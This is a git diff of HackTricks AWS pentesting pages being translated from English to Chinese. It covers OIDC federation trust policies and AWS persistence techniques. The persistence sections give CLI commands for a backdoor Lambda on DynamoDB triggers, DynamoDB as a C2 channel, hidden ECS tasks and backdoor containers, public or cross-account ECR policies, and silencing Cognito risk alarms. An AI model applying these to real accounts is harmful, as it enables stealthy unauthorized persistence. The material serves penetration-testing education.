[profile acc2] region=eu-west-2 @@ -368,23 +349,16 @@ role_session_name = source_profile = sts_regional_endpoints = regional ``` - -With this config file you can then use aws cli like: - +使用此配置文件,您可以像这样使用 aws cli: ``` aws --profile acc2 ... ``` +如果您正在寻找类似的东西,但针对**浏览器**,您可以查看**扩展** [**AWS Extend Switch Roles**](https://chrome.google.com/webstore/detail/aws-extend-switch-roles/jpmkfafbacpgapdghgdpembnojdlgkdl?hl=en)。 -If you are looking for something **similar** to this but for the **browser** you can check the **extension** [**AWS Extend Switch Roles**](https://chrome.google.com/webstore/detail/aws-extend-switch-roles/jpmkfafbacpgapdghgdpembnojdlgkdl?hl=en). - -## References +## 参考文献 - [https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html) - [https://aws.amazon.com/iam/](https://aws.amazon.com/iam/) - [https://docs.aws.amazon.com/singlesignon/latest/userguide/what-is.html](https://docs.aws.amazon.com/singlesignon/latest/userguide/what-is.html) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md b/src/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md index 73ae6b448..ee9ea8ce7 100644 --- a/src/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md +++ b/src/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md @@ -1,87 +1,84 @@ -# AWS - Federation Abuse +# AWS - 联邦滥用 {{#include ../../../banners/hacktricks-training.md}} ## SAML -For info about SAML please check: +有关 SAML 的信息,请查看: {{#ref}} https://book.hacktricks.xyz/pentesting-web/saml-attacks {{#endref}} -In order to configure an **Identity Federation through SAML** you just need to provide a **name** and the **metadata XML** containing all the SAML configuration (**endpoints**, **certificate** with public key) +为了通过 SAML 配置 **身份联邦**,您只需提供一个 **名称** 和包含所有 SAML 配置的 **元数据 XML**(**端点**,**带有公钥的证书**) -## OIDC - Github Actions Abuse +## OIDC - Github Actions 滥用 -In order to add a github action as Identity provider: - -1. For _Provider type_, select **OpenID Connect**. -2. For _Provider URL_, enter `https://token.actions.githubusercontent.com` -3. Click on _Get thumbprint_ to get the thumbprint of the provider -4. For _Audience_, enter `sts.amazonaws.com` -5. Create a **new role** with the **permissions** the github action need and a **trust policy** that trust the provider like: - - ```json - { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "Federated": "arn:aws:iam::0123456789:oidc-provider/token.actions.githubusercontent.com" - }, - "Action": "sts:AssumeRoleWithWebIdentity", - "Condition": { - "StringEquals": { - "token.actions.githubusercontent.com:sub": [ - "repo:ORG_OR_USER_NAME/REPOSITORY:pull_request", - "repo:ORG_OR_USER_NAME/REPOSITORY:ref:refs/heads/main" - ], - "token.actions.githubusercontent.com:aud": "sts.amazonaws.com" - } - } - } - ] - } - ``` -6. Note in the previous policy how only a **branch** from **repository** of an **organization** was authorized with a specific **trigger**. -7. The **ARN** of the **role** the github action is going to be able to **impersonate** is going to be the "secret" the github action needs to know, so **store** it inside a **secret** inside an **environment**. -8. Finally use a github action to configure the AWS creds to be used by the workflow: +为了将 github action 添加为身份提供者: +1. 对于 _提供者类型_,选择 **OpenID Connect**。 +2. 对于 _提供者 URL_,输入 `https://token.actions.githubusercontent.com` +3. 点击 _获取指纹_ 以获取提供者的指纹 +4. 对于 _受众_,输入 `sts.amazonaws.com` +5. 创建一个具有 github action 所需的 **权限** 和信任提供者的 **信任策略** 的 **新角色**,例如: +- ```json +{ +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Principal": { +"Federated": "arn:aws:iam::0123456789:oidc-provider/token.actions.githubusercontent.com" +}, +"Action": "sts:AssumeRoleWithWebIdentity", +"Condition": { +"StringEquals": { +"token.actions.githubusercontent.com:sub": [ +"repo:ORG_OR_USER_NAME/REPOSITORY:pull_request", +"repo:ORG_OR_USER_NAME/REPOSITORY:ref:refs/heads/main" +], +"token.actions.githubusercontent.com:aud": "sts.amazonaws.com" +} +} +} +] +} +``` +6. 请注意在前面的策略中,只有来自 **组织** 的 **存储库** 的一个 **分支** 被授权具有特定的 **触发器**。 +7. github action 将能够 **冒充** 的 **角色** 的 **ARN** 将是 github action 需要知道的“秘密”,因此 **将其存储** 在 **环境** 中的 **秘密** 内。 +8. 最后,使用 github action 配置工作流将使用的 AWS 凭据: ```yaml name: "test AWS Access" # The workflow should only trigger on pull requests to the main branch on: - pull_request: - branches: - - main +pull_request: +branches: +- main # Required to get the ID Token that will be used for OIDC permissions: - id-token: write - contents: read # needed for private repos to checkout +id-token: write +contents: read # needed for private repos to checkout jobs: - aws: - runs-on: ubuntu-latest - steps: - - name: Checkout - uses: actions/checkout@v3 +aws: +runs-on: ubuntu-latest +steps: +- name: Checkout +uses: actions/checkout@v3 - - name: Configure AWS Credentials - uses: aws-actions/configure-aws-credentials@v1 - with: - aws-region: eu-west-1 - role-to-assume:${{ secrets.READ_ROLE }} - role-session-name: OIDCSession +- name: Configure AWS Credentials +uses: aws-actions/configure-aws-credentials@v1 +with: +aws-region: eu-west-1 +role-to-assume:${{ secrets.READ_ROLE }} +role-session-name: OIDCSession - - run: aws sts get-caller-identity - shell: bash +- run: aws sts get-caller-identity +shell: bash ``` - -## OIDC - EKS Abuse - +## OIDC - EKS 滥用 ```bash # Crate an EKS cluster (~10min) eksctl create cluster --name demo --fargate @@ -91,43 +88,34 @@ eksctl create cluster --name demo --fargate # Create an Identity Provider for an EKS cluster eksctl utils associate-iam-oidc-provider --cluster Testing --approve ``` - -It's possible to generate **OIDC providers** in an **EKS** cluster simply by setting the **OIDC URL** of the cluster as a **new Open ID Identity provider**. This is a common default policy: - +可以通过将集群的 **OIDC URL** 设置为 **新的 Open ID 身份提供者** 在 **EKS** 集群中生成 **OIDC 提供者**。这是一个常见的默认策略: ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "Federated": "arn:aws:iam::123456789098:oidc-provider/oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B" - }, - "Action": "sts:AssumeRoleWithWebIdentity", - "Condition": { - "StringEquals": { - "oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B:aud": "sts.amazonaws.com" - } - } - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Principal": { +"Federated": "arn:aws:iam::123456789098:oidc-provider/oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B" +}, +"Action": "sts:AssumeRoleWithWebIdentity", +"Condition": { +"StringEquals": { +"oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B:aud": "sts.amazonaws.com" +} +} +} +] } ``` +该策略正确地指示**只有**具有**id** `20C159CDF6F2349B68846BEC03BE031B`的**EKS集群**可以承担该角色。然而,它并没有指明哪个服务账户可以承担它,这意味着**任何具有Web身份令牌的服务账户**都将**能够承担**该角色。 -This policy is correctly indicating than **only** the **EKS cluster** with **id** `20C159CDF6F2349B68846BEC03BE031B` can assume the role. However, it's not indicting which service account can assume it, which means that A**NY service account with a web identity token** is going to be **able to assume** the role. - -In order to specify **which service account should be able to assume the role,** it's needed to specify a **condition** where the **service account name is specified**, such as: - +为了指定**哪个服务账户应该能够承担该角色,**需要指定一个**条件**,其中**指定服务账户名称**,例如: ```bash "oidc.eks.region-code.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B:sub": "system:serviceaccount:default:my-service-account", ``` - ## References - [https://www.eliasbrange.dev/posts/secure-aws-deploys-from-github-actions-with-oidc/](https://www.eliasbrange.dev/posts/secure-aws-deploys-from-github-actions-with-oidc/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md b/src/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md index 28868b9f1..cde637d91 100644 --- a/src/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md +++ b/src/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md @@ -2,20 +2,16 @@ {{#include ../../banners/hacktricks-training.md}} -These are the permissions you need on each AWS account you want to audit to be able to run all the proposed AWS audit tools: +这些是您在每个要审计的 AWS 账户上需要的权限,以便能够运行所有提议的 AWS 审计工具: -- The default policy **arn:aws:iam::aws:policy/**[**ReadOnlyAccess**](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/ReadOnlyAccess) -- To run [aws_iam_review](https://github.com/carlospolop/aws_iam_review) you also need the permissions: - - **access-analyzer:List\*** - - **access-analyzer:Get\*** - - **iam:CreateServiceLinkedRole** - - **access-analyzer:CreateAnalyzer** - - Optional if the client generates the analyzers for you, but usually it's easier just to ask for this permission) - - **access-analyzer:DeleteAnalyzer** - - Optional if the client removes the analyzers for you, but usually it's easier just to ask for this permission) +- 默认策略 **arn:aws:iam::aws:policy/**[**ReadOnlyAccess**](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/ReadOnlyAccess) +- 要运行 [aws_iam_review](https://github.com/carlospolop/aws_iam_review),您还需要以下权限: +- **access-analyzer:List\*** +- **access-analyzer:Get\*** +- **iam:CreateServiceLinkedRole** +- **access-analyzer:CreateAnalyzer** +- 如果客户为您生成分析器,则可选,但通常直接请求此权限更容易) +- **access-analyzer:DeleteAnalyzer** +- 如果客户为您删除分析器,则可选,但通常直接请求此权限更容易) {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/README.md b/src/pentesting-cloud/aws-security/aws-persistence/README.md index f3b45c4d3..151e88fb6 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/README.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/README.md @@ -1,6 +1 @@ -# AWS - Persistence - - - - - +# AWS - 持久性 diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md index 6d2b0ec35..93f423119 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md @@ -4,7 +4,7 @@ ## API Gateway -For more information go to: +有关更多信息,请访问: {{#ref}} ../aws-services/aws-api-gateway-enum.md @@ -12,25 +12,21 @@ For more information go to: ### Resource Policy -Modify the resource policy of the API gateway(s) to grant yourself access to them +修改 API 网关的资源策略以授予自己访问权限 ### Modify Lambda Authorizers -Modify the code of lambda authorizers to grant yourself access to all the endpoints.\ -Or just remove the use of the authorizer. +修改 lambda 授权者的代码以授予自己对所有端点的访问权限。\ +或者只需删除授权者的使用。 ### IAM Permissions -If a resource is using IAM authorizer you could give yourself access to it modifying IAM permissions.\ -Or just remove the use of the authorizer. +如果资源使用 IAM 授权者,您可以通过修改 IAM 权限来授予自己访问权限。\ +或者只需删除授权者的使用。 ### API Keys -If API keys are used, you could leak them to maintain persistence or even create new ones.\ -Or just remove the use of API keys. +如果使用了 API 密钥,您可以泄露它们以保持持久性,甚至创建新的密钥。\ +或者只需删除 API 密钥的使用。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md index e2e037e53..f6fc5df40 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md @@ -4,24 +4,24 @@ ## Cognito -For more information, access: +有关更多信息,请访问: {{#ref}} ../aws-services/aws-cognito-enum/ {{#endref}} -### User persistence +### 用户持久性 -Cognito is a service that allows to give roles to unauthenticated and authenticated users and to control a directory of users. Several different configurations can be altered to maintain some persistence, like: +Cognito 是一个允许为未认证和已认证用户分配角色并控制用户目录的服务。可以更改几种不同的配置以保持某种持久性,例如: -- **Adding a User Pool** controlled by the user to an Identity Pool -- Give an **IAM role to an unauthenticated Identity Pool and allow Basic auth flow** - - Or to an **authenticated Identity Pool** if the attacker can login - - Or **improve the permissions** of the given roles -- **Create, verify & privesc** via attributes controlled users or new users in a **User Pool** -- **Allowing external Identity Providers** to login in a User Pool or in an Identity Pool +- **将用户池**添加到由用户控制的身份池 +- 为**未认证身份池**提供**IAM角色并允许基本身份验证流程** +- 或者为**已认证身份池**提供角色,如果攻击者可以登录 +- 或者**提高给定角色的权限** +- **通过受控属性的用户或新用户在**用户池中**创建、验证和权限提升** +- **允许外部身份提供者**在用户池或身份池中登录 -Check how to do these actions in +查看如何执行这些操作 {{#ref}} ../aws-privilege-escalation/aws-cognito-privesc.md @@ -29,18 +29,12 @@ Check how to do these actions in ### `cognito-idp:SetRiskConfiguration` -An attacker with this privilege could modify the risk configuration to be able to login as a Cognito user **without having alarms being triggered**. [**Check out the cli**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/set-risk-configuration.html) to check all the options: - +具有此权限的攻击者可以修改风险配置,以便能够作为 Cognito 用户登录**而不会触发警报**。[**查看 cli**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/set-risk-configuration.html)以查看所有选项: ```bash aws cognito-idp set-risk-configuration --user-pool-id --compromised-credentials-risk-configuration EventFilter=SIGN_UP,Actions={EventAction=NO_ACTION} ``` - -By default this is disabled: +默认情况下,这是禁用的:
{{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md index 75a824e73..15d7ea70c 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md @@ -1,67 +1,59 @@ -# AWS - DynamoDB Persistence +# AWS - DynamoDB 持久性 {{#include ../../../banners/hacktricks-training.md}} ### DynamoDB -For more information access: +有关更多信息,请访问: {{#ref}} ../aws-services/aws-dynamodb-enum.md {{#endref}} -### DynamoDB Triggers with Lambda Backdoor - -Using DynamoDB triggers, an attacker can create a **stealthy backdoor** by associating a malicious Lambda function with a table. The Lambda function can be triggered when an item is added, modified, or deleted, allowing the attacker to execute arbitrary code within the AWS account. +### 使用 Lambda 后门的 DynamoDB 触发器 +通过使用 DynamoDB 触发器,攻击者可以通过将恶意 Lambda 函数与表关联来创建一个 **隐蔽的后门**。当添加、修改或删除项目时,可以触发 Lambda 函数,从而允许攻击者在 AWS 账户内执行任意代码。 ```bash # Create a malicious Lambda function aws lambda create-function \ - --function-name MaliciousFunction \ - --runtime nodejs14.x \ - --role \ - --handler index.handler \ - --zip-file fileb://malicious_function.zip \ - --region +--function-name MaliciousFunction \ +--runtime nodejs14.x \ +--role \ +--handler index.handler \ +--zip-file fileb://malicious_function.zip \ +--region # Associate the Lambda function with the DynamoDB table as a trigger aws dynamodbstreams describe-stream \ - --table-name TargetTable \ - --region +--table-name TargetTable \ +--region # Note the "StreamArn" from the output aws lambda create-event-source-mapping \ - --function-name MaliciousFunction \ - --event-source \ - --region +--function-name MaliciousFunction \ +--event-source \ +--region ``` +为了保持持久性,攻击者可以在DynamoDB表中创建或修改项目,这将触发恶意的Lambda函数。这允许攻击者在AWS账户内执行代码,而无需直接与Lambda函数交互。 -To maintain persistence, the attacker can create or modify items in the DynamoDB table, which will trigger the malicious Lambda function. This allows the attacker to execute code within the AWS account without direct interaction with the Lambda function. - -### DynamoDB as a C2 Channel - -An attacker can use a DynamoDB table as a **command and control (C2) channel** by creating items containing commands and using compromised instances or Lambda functions to fetch and execute these commands. +### DynamoDB作为C2通道 +攻击者可以通过创建包含命令的项目并使用被攻陷的实例或Lambda函数来获取和执行这些命令,从而将DynamoDB表用作**命令和控制(C2)通道**。 ```bash # Create a DynamoDB table for C2 aws dynamodb create-table \ - --table-name C2Table \ - --attribute-definitions AttributeName=CommandId,AttributeType=S \ - --key-schema AttributeName=CommandId,KeyType=HASH \ - --provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \ - --region +--table-name C2Table \ +--attribute-definitions AttributeName=CommandId,AttributeType=S \ +--key-schema AttributeName=CommandId,KeyType=HASH \ +--provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \ +--region # Insert a command into the table aws dynamodb put-item \ - --table-name C2Table \ - --item '{"CommandId": {"S": "cmd1"}, "Command": {"S": "malicious_command"}}' \ - --region +--table-name C2Table \ +--item '{"CommandId": {"S": "cmd1"}, "Command": {"S": "malicious_command"}}' \ +--region ``` - -The compromised instances or Lambda functions can periodically check the C2 table for new commands, execute them, and optionally report the results back to the table. This allows the attacker to maintain persistence and control over the compromised resources. +被攻陷的实例或 Lambda 函数可以定期检查 C2 表以获取新命令,执行它们,并可选择将结果报告回表中。这使攻击者能够保持对被攻陷资源的持久性和控制。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md index b52ac9e85..4e8eaf642 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md @@ -1,58 +1,54 @@ -# AWS - EC2 Persistence +# AWS - EC2 持久性 {{#include ../../../banners/hacktricks-training.md}} ## EC2 -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/ {{#endref}} -### Security Group Connection Tracking Persistence +### 安全组连接跟踪持久性 -If a defender finds that an **EC2 instance was compromised** he will probably try to **isolate** the **network** of the machine. He could do this with an explicit **Deny NACL** (but NACLs affect the entire subnet), or **changing the security group** not allowing **any kind of inbound or outbound** traffic. +如果防御者发现**EC2 实例被攻陷**,他可能会尝试**隔离**该机器的**网络**。他可以通过显式的**拒绝 NACL**(但 NACL 会影响整个子网)或**更改安全组**来不允许**任何类型的入站或出站**流量。 -If the attacker had a **reverse shell originated from the machine**, even if the SG is modified to not allow inboud or outbound traffic, the **connection won't be killed due to** [**Security Group Connection Tracking**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/security-group-connection-tracking.html)**.** +如果攻击者从该机器获得了**反向 shell**,即使安全组被修改为不允许入站或出站流量,**连接也不会被终止,因为** [**安全组连接跟踪**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/security-group-connection-tracking.html)**。** -### EC2 Lifecycle Manager +### EC2 生命周期管理器 -This service allow to **schedule** the **creation of AMIs and snapshots** and even **share them with other accounts**.\ -An attacker could configure the **generation of AMIs or snapshots** of all the images or all the volumes **every week** and **share them with his account**. +该服务允许**调度**创建**AMI 和快照**,甚至**与其他账户共享**。\ +攻击者可以配置**每周生成所有镜像或所有卷的 AMI 或快照**并**与他的账户共享**。 -### Scheduled Instances +### 定时实例 -It's possible to schedule instances to run daily, weekly or even monthly. An attacker could run a machine with high privileges or interesting access where he could access. +可以调度实例每天、每周甚至每月运行。攻击者可以运行一台具有高权限或有趣访问权限的机器。 -### Spot Fleet Request +### Spot Fleet 请求 -Spot instances are **cheaper** than regular instances. An attacker could launch a **small spot fleet request for 5 year** (for example), with **automatic IP** assignment and a **user data** that sends to the attacker **when the spot instance start** and the **IP address** and with a **high privileged IAM role**. +Spot 实例比常规实例**便宜**。攻击者可以发起一个**为期 5 年的小型 Spot Fleet 请求**(例如),并**自动分配 IP**,以及一个**用户数据**,在**Spot 实例启动时**发送给攻击者**IP 地址**和**高权限 IAM 角色**。 -### Backdoor Instances +### 后门实例 -An attacker could get access to the instances and backdoor them: +攻击者可以访问实例并对其进行后门处理: -- Using a traditional **rootkit** for example -- Adding a new **public SSH key** (check [EC2 privesc options](../aws-privilege-escalation/aws-ec2-privesc.md)) -- Backdooring the **User Data** +- 例如使用传统的**rootkit** +- 添加一个新的**公共 SSH 密钥**(查看 [EC2 权限提升选项](../aws-privilege-escalation/aws-ec2-privesc.md)) +- 对**用户数据**进行后门处理 -### **Backdoor Launch Configuration** +### **后门启动配置** -- Backdoor the used AMI -- Backdoor the User Data -- Backdoor the Key Pair +- 对使用的 AMI 进行后门处理 +- 对用户数据进行后门处理 +- 对密钥对进行后门处理 ### VPN -Create a VPN so the attacker will be able to connect directly through i to the VPC. +创建一个 VPN,以便攻击者能够直接通过它连接到 VPC。 -### VPC Peering +### VPC 对等连接 -Create a peering connection between the victim VPC and the attacker VPC so he will be able to access the victim VPC. +在受害者 VPC 和攻击者 VPC 之间创建对等连接,以便他能够访问受害者 VPC。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md index 07928fbd4..95a579b72 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md @@ -4,98 +4,88 @@ ## ECR -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-ecr-enum.md {{#endref}} -### Hidden Docker Image with Malicious Code +### 带有恶意代码的隐藏Docker镜像 -An attacker could **upload a Docker image containing malicious code** to an ECR repository and use it to maintain persistence in the target AWS account. The attacker could then deploy the malicious image to various services within the account, such as Amazon ECS or EKS, in a stealthy manner. +攻击者可以**将包含恶意代码的Docker镜像**上传到ECR存储库,并利用它在目标AWS账户中保持持久性。然后,攻击者可以以隐蔽的方式将恶意镜像部署到账户内的各种服务,例如Amazon ECS或EKS。 -### Repository Policy - -Add a policy to a single repository granting yourself (or everybody) access to a repository: +### 存储库策略 +向单个存储库添加策略,授予您自己(或所有人)对存储库的访问权限: ```bash aws ecr set-repository-policy \ - --repository-name cluster-autoscaler \ - --policy-text file:///tmp/my-policy.json +--repository-name cluster-autoscaler \ +--policy-text file:///tmp/my-policy.json # With a .json such as { - "Version" : "2008-10-17", - "Statement" : [ - { - "Sid" : "allow public pull", - "Effect" : "Allow", - "Principal" : "*", - "Action" : [ - "ecr:BatchCheckLayerAvailability", - "ecr:BatchGetImage", - "ecr:GetDownloadUrlForLayer" - ] - } - ] +"Version" : "2008-10-17", +"Statement" : [ +{ +"Sid" : "allow public pull", +"Effect" : "Allow", +"Principal" : "*", +"Action" : [ +"ecr:BatchCheckLayerAvailability", +"ecr:BatchGetImage", +"ecr:GetDownloadUrlForLayer" +] +} +] } ``` - > [!WARNING] -> Note that ECR requires that users have **permission** to make calls to the **`ecr:GetAuthorizationToken`** API through an IAM policy **before they can authenticate** to a registry and push or pull any images from any Amazon ECR repository. +> 请注意,ECR要求用户通过IAM策略具有**权限**,以便在**认证**到注册表并从任何Amazon ECR存储库推送或拉取任何镜像之前,可以调用**`ecr:GetAuthorizationToken`** API。 -### Registry Policy & Cross-account Replication +### 注册表策略与跨账户复制 -It's possible to automatically replicate a registry in an external account configuring cross-account replication, where you need to **indicate the external account** there you want to replicate the registry. +可以通过配置跨账户复制自动复制外部账户中的注册表,在那里您需要**指明外部账户**,您希望复制注册表。
-First, you need to give the external account access over the registry with a **registry policy** like: - +首先,您需要通过**注册表策略**授予外部账户对注册表的访问权限,例如: ```bash aws ecr put-registry-policy --policy-text file://my-policy.json # With a .json like: { - "Sid": "asdasd", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::947247140022:root" - }, - "Action": [ - "ecr:CreateRepository", - "ecr:ReplicateImage" - ], - "Resource": "arn:aws:ecr:eu-central-1:947247140022:repository/*" +"Sid": "asdasd", +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam::947247140022:root" +}, +"Action": [ +"ecr:CreateRepository", +"ecr:ReplicateImage" +], +"Resource": "arn:aws:ecr:eu-central-1:947247140022:repository/*" } ``` - -Then apply the replication config: - +然后应用复制配置: ```bash aws ecr put-replication-configuration \ - --replication-configuration file://replication-settings.json \ - --region us-west-2 +--replication-configuration file://replication-settings.json \ +--region us-west-2 # Having the .json a content such as: { - "rules": [{ - "destinations": [{ - "region": "destination_region", - "registryId": "destination_accountId" - }], - "repositoryFilters": [{ - "filter": "repository_prefix_name", - "filterType": "PREFIX_MATCH" - }] - }] +"rules": [{ +"destinations": [{ +"region": "destination_region", +"registryId": "destination_accountId" +}], +"repositoryFilters": [{ +"filter": "repository_prefix_name", +"filterType": "PREFIX_MATCH" +}] +}] } ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md index 988626c8f..ab788d522 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-ecs-persistence.md @@ -1,32 +1,31 @@ -# AWS - ECS Persistence +# AWS - ECS 持久性 {{#include ../../../banners/hacktricks-training.md}} ## ECS -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-ecs-enum.md {{#endref}} -### Hidden Periodic ECS Task +### 隐藏的周期性 ECS 任务 > [!NOTE] -> TODO: Test - -An attacker can create a hidden periodic ECS task using Amazon EventBridge to **schedule the execution of a malicious task periodically**. This task can perform reconnaissance, exfiltrate data, or maintain persistence in the AWS account. +> TODO: 测试 +攻击者可以使用 Amazon EventBridge 创建一个隐藏的周期性 ECS 任务,以**定期调度恶意任务的执行**。该任务可以进行侦察、外泄数据或在 AWS 账户中维持持久性。 ```bash # Create a malicious task definition aws ecs register-task-definition --family "malicious-task" --container-definitions '[ - { - "name": "malicious-container", - "image": "malicious-image:latest", - "memory": 256, - "cpu": 10, - "essential": true - } +{ +"name": "malicious-container", +"image": "malicious-image:latest", +"memory": 256, +"cpu": 10, +"essential": true +} ]' # Create an Amazon EventBridge rule to trigger the task periodically @@ -34,70 +33,61 @@ aws events put-rule --name "malicious-ecs-task-rule" --schedule-expression "rate # Add a target to the rule to run the malicious ECS task aws events put-targets --rule "malicious-ecs-task-rule" --targets '[ - { - "Id": "malicious-ecs-task-target", - "Arn": "arn:aws:ecs:region:account-id:cluster/your-cluster", - "RoleArn": "arn:aws:iam::account-id:role/your-eventbridge-role", - "EcsParameters": { - "TaskDefinitionArn": "arn:aws:ecs:region:account-id:task-definition/malicious-task", - "TaskCount": 1 - } - } +{ +"Id": "malicious-ecs-task-target", +"Arn": "arn:aws:ecs:region:account-id:cluster/your-cluster", +"RoleArn": "arn:aws:iam::account-id:role/your-eventbridge-role", +"EcsParameters": { +"TaskDefinitionArn": "arn:aws:ecs:region:account-id:task-definition/malicious-task", +"TaskCount": 1 +} +} ]' ``` - -### Backdoor Container in Existing ECS Task Definition +### 在现有 ECS 任务定义中添加后门容器 > [!NOTE] -> TODO: Test - -An attacker can add a **stealthy backdoor container** in an existing ECS task definition that runs alongside legitimate containers. The backdoor container can be used for persistence and performing malicious activities. +> TODO: 测试 +攻击者可以在现有的 ECS 任务定义中添加一个 **隐蔽的后门容器**,该容器与合法容器并行运行。后门容器可用于持久性和执行恶意活动。 ```bash # Update the existing task definition to include the backdoor container aws ecs register-task-definition --family "existing-task" --container-definitions '[ - { - "name": "legitimate-container", - "image": "legitimate-image:latest", - "memory": 256, - "cpu": 10, - "essential": true - }, - { - "name": "backdoor-container", - "image": "malicious-image:latest", - "memory": 256, - "cpu": 10, - "essential": false - } +{ +"name": "legitimate-container", +"image": "legitimate-image:latest", +"memory": 256, +"cpu": 10, +"essential": true +}, +{ +"name": "backdoor-container", +"image": "malicious-image:latest", +"memory": 256, +"cpu": 10, +"essential": false +} ]' ``` - ### Undocumented ECS Service > [!NOTE] > TODO: Test -An attacker can create an **undocumented ECS service** that runs a malicious task. By setting the desired number of tasks to a minimum and disabling logging, it becomes harder for administrators to notice the malicious service. - +攻击者可以创建一个**未记录的ECS服务**,该服务运行恶意任务。通过将所需的任务数量设置为最小并禁用日志记录,管理员更难注意到该恶意服务。 ```bash # Create a malicious task definition aws ecs register-task-definition --family "malicious-task" --container-definitions '[ - { - "name": "malicious-container", - "image": "malicious-image:latest", - "memory": 256, - "cpu": 10, - "essential": true - } +{ +"name": "malicious-container", +"image": "malicious-image:latest", +"memory": 256, +"cpu": 10, +"essential": true +} ]' # Create an undocumented ECS service with the malicious task definition aws ecs create-service --service-name "undocumented-service" --task-definition "malicious-task" --desired-count 1 --cluster "your-cluster" ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md index bdb282d41..4270bb779 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md @@ -1,25 +1,21 @@ -# AWS - EFS Persistence +# AWS - EFS 持久性 {{#include ../../../banners/hacktricks-training.md}} ## EFS -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-efs-enum.md {{#endref}} -### Modify Resource Policy / Security Groups +### 修改资源策略 / 安全组 -Modifying the **resource policy and/or security groups** you can try to persist your access into the file system. +通过修改 **资源策略和/或安全组**,您可以尝试将您的访问持久化到文件系统中。 -### Create Access Point +### 创建访问点 -You could **create an access point** (with root access to `/`) accessible from a service were you have implemented **other persistence** to keep privileged access to the file system. +您可以 **创建一个访问点**(具有对 `/` 的根访问权限),该访问点可以从您已实施 **其他持久性** 的服务访问,以保持对文件系统的特权访问。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git 